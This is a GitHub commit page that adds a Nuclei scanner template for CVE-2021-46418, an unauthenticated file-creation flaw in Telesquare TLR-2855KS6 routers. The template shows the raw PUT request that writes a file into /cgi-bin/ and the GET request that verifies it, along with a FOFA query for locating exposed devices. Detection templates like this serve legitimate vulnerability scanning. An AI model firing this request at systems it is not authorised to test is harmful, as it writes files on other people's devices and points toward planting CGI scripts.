Skip to content

Commit

Permalink
Merge pull request #9494 from projectdiscovery/CVE-2021-46418
Browse files Browse the repository at this point in the history
Create CVE-2021-46418.yaml
  • Loading branch information
DhiyaneshGeek committed Apr 4, 2024
2 parents 5983f97 + a66028f commit b63b8c2
Showing 1 changed file with 49 additions and 0 deletions.
49 changes: 49 additions & 0 deletions http/cves/2021/CVE-2021-46418.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
id: CVE-2021-46418

info:
name: Telesquare TLR-2855KS6 - Arbitrary File Creation
author: DhiyaneshDK
severity: high
description: |
An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
reference:
- http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
- https://github.com/ARPSyndicate/cvemon
- https://nvd.nist.gov/vuln/detail/CVE-2021-46418
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-46418
epss-score: 0.0528
epss-percentile: 0.92891
cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: telesquare
product: tlr-2855ks6_firmware
fofa-query: product=="TELESQUARE-TLR-2855KS6"
tags: packetstorm,cve,cve2021,telesquare,intrusive

variables:
filename: "{{rand_base(6)}}"

http:
- raw:
- |
PUT /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- |
GET /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 201'
- 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")'
- 'contains(body_2, "{{randstr}}")'
condition: and

0 comments on commit b63b8c2

Please sign in to comment.